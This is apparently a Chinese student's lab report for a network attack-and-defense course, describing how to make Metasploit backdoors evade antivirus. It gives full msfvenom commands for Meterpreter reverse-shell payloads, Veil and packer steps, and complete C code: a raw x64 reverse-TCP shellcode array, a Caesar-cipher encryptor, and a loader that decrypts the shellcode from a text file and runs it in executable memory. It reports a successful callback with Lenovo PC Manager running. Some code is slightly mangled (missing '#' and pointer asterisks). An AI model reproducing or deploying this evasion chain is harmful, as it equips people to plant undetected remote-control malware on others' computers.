标签：文件 exe x41 恶意软件 x48 2024 2025 x00 20222303

一、实验内容

1．正确使用msf编码器，使用msfvenom生成如jar之类的其他文件；
2．能够使用veil，加壳工具；
3．能够使用C + shellcode编程；
4．能够通过组合应用各种技术实现恶意代码免杀；
5．用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本。

二、基础问题回答

1. 杀软是如何检测出恶意代码的？

杀毒软件检测恶意代码主要通过以下几种技术：
①特征码检测：这是最基本的检测技术，杀毒软件通过比对恶意代码的特征码来识别病毒。特征码是一段能够唯一标识恶意代码的数据，可以是文件的MD5值或者文件中唯一存在的一段字符串。
②启发式扫描：启发式技术通过分析文件的行为和内容来检测病毒。它使用类似于人工智能的算法，根据病毒的行为模式和特征来识别恶意软件。如果文件的行为与已知的恶意软件相似，或者其内容包含可疑的代码模式，杀毒软件就会将其标记为潜在的病毒。
③行为分析：类似于启发式检测，但更侧重于程序运行时的行为。通过监视程序的行为，如文件操作、注册表操作、网络操作等，来判断其是否为恶意代码。
④机器学习：现代杀毒软件还采用了机器学习技术，通过分析大量的病毒样本和安全事件数据，自动学习病毒的行为模式和特征，然后利用这些知识来优化启发式扫描和主动防御算法，提高检测的响应速度和准确性。
⑤深度学习：深度学习作为机器学习的一个分支，可以实现自动化的特征提取，近些年在处理较大数据量的应用场景中取得了优于传统机器学习算法的效果。

2. 免杀是做什么的？

免杀技术，全称为反杀毒技术（Anti Anti-Virus），简称“免杀”，它指的是一种能使病毒、木马等恶意软件免于被杀毒软件查杀的技术。免杀技术的涉猎面非常广，包括反汇编、逆向工程、系统漏洞利用以及壳技术等黑客技术，因此其难度较高，一般人难以深入掌握。
免杀技术的核心在于修改病毒、木马等恶意软件的内容，以改变其特征码，从而躲避杀毒软件的查杀。特征码是杀毒软件用于识别恶意软件的一段特定代码，通过修改这些代码，恶意软件就能绕过杀毒软件的检测机制。

3. 免杀的基本方法有哪些？

① 静态免杀方法
代码混淆：通过修改恶意软件的代码，使其难以被反病毒软件理解。例如，使用代码混淆技术，将恶意代码的结构、逻辑或数据进行变换，以增加反病毒软件分析的难度。
特征码修改：恶意软件通常会被杀毒软件通过特征码识别。通过修改恶意软件的特征码，可以使其避开杀毒软件的检测。这通常涉及到对恶意软件的二进制文件进行微小的修改。
加壳与加密：对恶意软件进行加壳处理，即将恶意软件的可执行文件压缩打包，并与解压缩代码组合成单个可执行文件。在运行时，解压缩代码会重新创建原始代码并执行。同时，对恶意软件的二进制文件进行加密处理，以防止其被逆向分析。
② 动态免杀方法
内存注入：将恶意代码注入到其他正在运行的进程中，利用这些进程来执行恶意操作。这种方法可以绕过杀毒软件对恶意软件的直接检测。
行为模拟：恶意软件在运行时，会模拟正常软件的行为，以避免触发杀毒软件的行为监控机制。
沙箱检测：恶意软件会检测自身是否处于沙箱环境中（一种用于分析恶意软件行为的隔离环境）。如果检测到处于沙箱环境，则不执行恶意操作，以避免被杀毒软件捕获。
③ 其他免杀方法
条件编译：根据编译时的条件，选择性地编译恶意软件的某些部分。例如，只有在满足特定条件时，才编译恶意代码的部分功能。
利用系统漏洞：利用操作系统或应用程序的漏洞，绕过安全检测机制。这种方法需要恶意软件开发者对系统漏洞有深入的了解。
合法文件利用：将恶意代码嵌入到合法的文件中，如图片、文档等，利用这些文件的合法性来绕过杀毒软件的检测。

4. 开启杀软能绝对防止电脑中恶意代码吗？

开启杀毒软件不能绝对防止电脑中恶意代码的感染。虽然杀毒软件可以大幅度提高电脑的安全性，减少恶意软件的威胁，但恶意软件开发者会不断研究和利用新的技术手段来绕过杀毒软件的检测机制，例如通过代码混淆、加壳、加密等手段，使恶意软件在杀毒软件面前“隐身”。新出现的恶意软件或变种可能还未被安全厂商发现，因此未被加入到杀毒软件的病毒签名数据库中，导致杀毒软件无法识别和清除这些新的威胁。
同时，杀毒软件虽然能够基于特征码、行为分析等多种方式进行检测，但仍然存在一些局限性。例如，基于特征码的检测方式需要事先知道恶意代码的特征，而基于行为分析的方式则可能因为误报或漏报而影响用户体验。

三、实验过程

使用msfvenom生成jar等文件。
查看 msfvenom 支持的所有输出格式：输入msfvenom --list formats；

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.175 LPORT=2303 -f exe > 20222303xpx.exe，生成payload；
-p windows/meterpreter/reverse_tcp:指定了要生成的 payload 类型，是一个 Meterpreter 反向 TCP 连接；
LHOST=192.168.3.175设置了连接回的本地 IP 地址，即kali虚拟机的 IP 地址；
LPORT=2303设置了连接回的本地端口号，这里为学号后四位；
-f exe: 这指定了输出格式为 Windows 可执行文件；

查看 msfvenom 支持的所有编码方式：输入msfvenom --list encoders；

使用编码器对payload进行编码，输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.3.175 LPORT=2303 -f exe > 20222303xpx-2.exe；
-e x86/shikata_ga_nai: 这指定了要使用的编码器；
-b ‘\x00’: 这指定了需要避免的坏字符集；
LHOST、LPORT同上；

多次编码：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.3.175 LPORT=2303 -f exe > 20222303xpx-3.exe；
-i 10表示编码10次；

选择一个适用于Java环境的payload来生成jar文件：msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.3.175 LPORT=2303 -f jar > 20222303xpx-4.jar；
使用编码器对payload进行编码：msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.3.175 LPORT=1313 -e x86/shikata_ga_nai -i 10 -f jar > 20222303xpx-5.jar；

生成一个反向 TCP 连接的 Linux elf 可执行文件：msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.3.175 LPORT=2303 -f elf > 20222303xpx-6.elf
使用编码器对payload进行编码：msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.3.175 LPORT=2303 -e x86/shikata_ga_nai -i 10 -f elf > 20222303xpx-7.elf

将生成的20222303xpx.exe等多个文件放到共享文件夹中传到主机上；
打开VirusTotal的链接https://www.virustotal.com/，放入文件，使用VirusTotal进行检测；

2．使用veil工具
安装veil，需要保持虚拟机是联网状态，依次输入以下命令：
mkdir -p ~/.cache/wine
cd ~/.cache/wine
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
sudo apt-get install libncurses5*
sudo apt-get install libavutil55*
sudo apt-get install gcc-mingw-w64*
sudo apt-get install wine32

再依次输入：
apt-get install veil ——安装veil
sudo su
cd /usr/share/veil/config/
vim setup.sh

在第200多行的代码中，找到下图内容，按i键进入编辑模式，把下载地址换成https://gitee.com/spears/VeilDependencies.git，按ESC键，输入:wq退出；

运行veil进行安装；

过程中可能需要安装多个程序，一路默认安装即可；

发现报错，输入sudo /usr/share/veil/config/setup.sh --force --silent，继续安装；

完成安装，输入veil；

输入use evasion ，进入Evil—Evasion；

输入list，查看可使用的payload类型；

使用c/meterpretermrev_tcp.py，即7号，所以输入use 7；

依次输入：
set LHOST 192.168.3.175 设置反弹链接ip，此处为Kali的ip
set LPORT 2303 设置端口
generate
输入生成的文件名称：20222303_veil；

输入cd /var/lib/veil/output/compiled/，进入文件夹，输入ls查看生成的.exe可执行文件；

同样，将20222303_veil.exe文件移入共享文件夹，在主机上打开链接https://www.virustotal.com/ http://www.virscan.org/，放入文件，使用VirusTotal进行检测；

3．使用C + shellcode编程
输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.175 LPORT=2303 -f c，其中LHOST为反弹回连的IP，即Kali的IP；

新建20222303.c文件，并进行编辑；

按i键进入编辑模式，将使用msfvenom生成的buf[]数组复制粘贴到打开的文件中，并输入代码，代码如下；

按ESC键，输入:wq退出编辑；
输入i686-w64-mingw32-g++ 20222303.c -o 20222303.exe；

同样，将20222303.exe文件移入共享文件夹，在主机上打开链接https://www.virustotal.com/，放入文件，使用VirusTotal进行检测；

4．加壳
upx加壳：输入upx 20222303.exe -o upx20222303.exe；

hyperion加壳：
输入cp upx20222303.exe /usr/share/windows-resources/hyperion；
输入cd /usr/share/windows-resources/hyperion进入文件夹；
输入ls查看生成的可执行文件；

输入wine hyperion.exe -v upx20222303.exe upx20222303xpx.exe

同样，将upx20222303.exe、upx20222303xpx.exe文件移入共享文件夹，在主机上打开链接https://www.virustotal.com/，放入文件，使用VirusTotal进行检测；

发现套壳以后所查杀出来的恶意代码明显降低
5．通过组合应用各种技术实现恶意代码免杀
组合技术：msfvenom生成Shellcode数组，再使用凯撒加密对数组进行加密，将加密后的密文放入txt文件中，再编写C语言代码，从txt文件中读取密文，解密并运行Shellcode，最后生成.exe可执行文件。
kali虚拟机中通过msfvenom生成Shellcode数组，代码如下msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.175 LPORT=10086 -f c；

将buf[]中的内容复制；
主机中下载DEV C++软件，安装包下载如下：
链接：https://pan.baidu.com/s/1-uPhdB2TaM2ZGhSIzqv0KQ?pwd=mmzs
提取码：mmzs
下载后双击安装，若安装完成后新建的.cpp文件无法编译运行，则参考链接：https://blog.csdn.net/qq_45504273/article/details/113705025?fromshare=blogdetail&sharetype=blogdetail&sharerId=113705025&sharerefer=PC&sharesource=m0_74153273&sharefrom=from_link
新建20222303_jiami.cpp文件，输入代码，代码功能为将复制内容放入shellcode1[]数组中，通过代码将shellcode1进行凯撒加密，将密文输入到2303jiami.txt文件中；
在同文件夹下新建空文件2303jiami.txt，用以存放密文；
代码如下：
include <stdio.h>
include<string.h>
//凯撒加密函数，适用于unsigned char数组
void caesarEncrypt(unsigned char *data, size_t length, int shift) {
for (size_t i = 0; i < length; i++) {
// 对每个字节进行位移
data[i]= (data[i] + shift) & 0xFF;
}
}
int main( ) {
unsigned char shellcode1[] ="\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x4d\x31\xc9\x48\x8b\x72\x50\x48\x0f"
"\xb7\x4a\x4a\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x8b"
"\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x41\x51\x0f"
"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0"
"\x74\x67\x48\x01\xd0\x44\x8b\x40\x20\x50\x8b\x48\x18\x49"
"\x01\xd0\xe3\x56\x48\xff\xc9\x4d\x31\xc9\x41\x8b\x34\x88"
"\x48\x01\xd6\x48\x31\xc0\x41\xc1\xc9\x0d\xac\x41\x01\xc1"
"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"
"\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"
"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83"
"\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00"
"\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49"
"\x89\xe5\x49\xbc\x02\x00\x27\x66\xc0\xa8\x4c\x80\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5"
"\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b"
"\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31"
"\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41"
"\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58"
"\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00"
"\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58"
"\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00"
"\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68"
"\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba"
"\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9"
"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68"
"\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f"
"\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49"
"\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48"
"\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
"\xf0\xb5\xa2\x56\xff\xd5";
int shift =3; // 加密位移
printf("original: ");
for (size_t i = 0; i < 510; i++) {
printf("\x%02x",shellcode1[i]);
}
printf("\n");
caesarEncrypt(shellcode1,510,shift);
printf("Encrypted:");
for (size_t i =0;i< 510; i++){
printf("\x%02x",shellcode1[i]);
}
printf("\n");
FILE *file = fopen("2303jiami.txt", "w");
if (file != NULL) {
for (size_t i = 0; i < 510; i++) {
fprintf(file, "\x%02x", shellcode1[i]);
}
fprintf(file, "\n");
fclose(file);
} else {
printf("Error opening file!\n");
}
return 0;
}

编辑并运行该文件；
新建20222303_jiemi.cpp文件，输入代码，代码功能为读取2303jiami.txt文件中的内容到shellcode1[]数组中，并进行解密，再运行shellcode；
代码如下：
include <windows.h>
include <stdio.h>
include <stdlib.h>
include <string.h>

// 凯撒解密函数，适用于unsigned char数组
void caesarDecrypt(unsigned char *data, size_t length, int shift) {
for (size_t i = 0; i < length; i++) {
// 对每个字节进行位移
data[i] = (unsigned char)((data[i] - shift + 256) % 256);
}
}

int main() {
int shift = 3; // 凯撒加密的位移值
unsigned char shellcode1[511]; // 假设文件中的内容不超过510字节
char line[1024]; // 用于读取文件的临时缓冲区
// 打开文件
FILE file = fopen("2303jiami.txt", "r");
if (file == NULL) {
perror("Error opening file");
return 1;
}
// 读取文件内容到shellcode1数组中
size_t length = 0;
while (fgets(line, sizeof(line), file)) {
// 将读取的十六进制字符串转换为字节并存储在shellcode1中
for (size_t i = 0; line[i] != '\0' && line[i] != '\n'; i += 1) {
if (sscanf(&line[i], "\x%02hhx", &shellcode1[length]) == 1) {
length++;
}
}
}
fclose(file);
// 解密shellcode
caesarDecrypt(shellcode1, length, shift);
// 输出解密后的shellcode
/printf("Decrypted Shellcode:\n");
for (size_t i = 0; i < 510; i++) {
printf("\x%02x", shellcode1[i]);
}
printf("\n");/
// 分配内存并设置为可执行
LPVOID exec = VirtualAlloc(0, sizeof shellcode1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// 将解密后的shellcode复制到分配的内存中
memcpy(exec, shellcode1, sizeof shellcode1);
// 执行shellcode
((void()())exec)();
return 0;
}

编译该文件，打开文件所在位置，可以看到如下文件：

20222303_jiemi.exe即为所需文件；
将两个文件放在桌面，查看防火墙的状态，发现可以与杀软共生；

6．用电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本。
在kali中使用msfconsole指令进入msf控制台，对msf控制台进行配置；
依次输入以下命令：
use exploit/multi/handler 使用监听模块，设置payload
set payload windows/x64/meterpreter/reverse_tcp 使用和生成后门程序时相同的payload
set LHOST 192.168.3.175 和生成后门程序时指定的IP相同
set LPORT 10086
输入run；

win10虚拟机里双击运行20222303_jiemi.exe，返回到kali，输入sysinfo，查看版本；

可以查看到win10版本，说明回连并攻击成功。
电脑的杀软名称与版本：联想电脑管家v5.1.80.9023

四、实验中遇到的问题及解决

问题1：安装veil时，多次报错，报错是在安装veil的最后一步报错。

解决：通过上网查阅资料，对于报错，输入sudo /usr/share/veil/config/setup.sh --force --silent，继续安装。

问题2：在通过多种手段实现恶意代码免杀时，参考i686-w64-mingw32-g++ 20222303.c -o 20222303.exe将代码转化为可执行文件，但是放在win10系统中后打开运行不了，报错。

解决：通过下载DEV C++软件，编写代码，编译并运行，DEV C++可通过编译将文件转换为.exe可执行文件，且放在win10系统中可以直接运行。

问题3：将加密后的密文shellcode放在20222303_jiemi.cpp文件里，文件中代码将其解密并运行，但是放到win10系统中被杀毒软件杀出来了。

解决：将密文shellcode拿出放在txt文件中，20222303_jiemi.cpp文件从txt文件中读取密文，这样杀毒软件查不出来了。

问题4：最开始生成shellcode时使用的是msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.175 LPORT=10086 -f c，发现最后生成的恶意可执行文件打开后几秒便消失了，无法运行到底。

解决：更换版本，使用msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.175 LPORT=10086 -f c，最后成功运行。

问题5：使用msfconsole，设置端口号为学号后四位，但是输入run后显示不成功。

解决：该端口号被占用了，所以改用较大的端口号10086，可以正常运行。

五、实验体会

在本次实验中，我学习了如何通过msf编码器、veil、加壳工具、C + shellcode编程等多种方式生成恶意程序，并尝试实现免杀。在尝试通过多种手段实现恶意代码免杀过程中，出现过许多问题，我翻阅过不少资料，也询问过身边的同学，耗费了好几天时间，最终完成了实验。我个人觉得这次实验相当有趣，真正使我体会到了网络攻防的魅力之处，通过本次实验，我在系统学习到了免杀原理与实践的许多知识的同时，也锻炼了我的耐心和细心。
通过本次实验，我学到了许多免杀方法，对免杀原理有了更深刻的认识，也锻炼了解决问题的能力。同时，我还认识到网络安全是一个动态的、不断变化的领域，随着时代的发展，有越来越多的技术手段被发明出来，我们需要不断地学习和掌握新的安全技术，守好网络安全这道防线。

六、参考文献

《实验指导书》（https://gitee.com/wildlinux/NetSec/blob/master/ExpGuides/0x23_MAL_免杀原理与实践.md）
《免杀常用技术方法》（https://blog.csdn.net/whatday/article/details/105715578）

标签：文件,exe,x41,恶意软件,x48,2024,2025,x00,20222303
From： https://www.cnblogs.com/bbg0523/p/18508537

20222303 2024-2025-1 《网络与系统攻防技术》实验三实验报告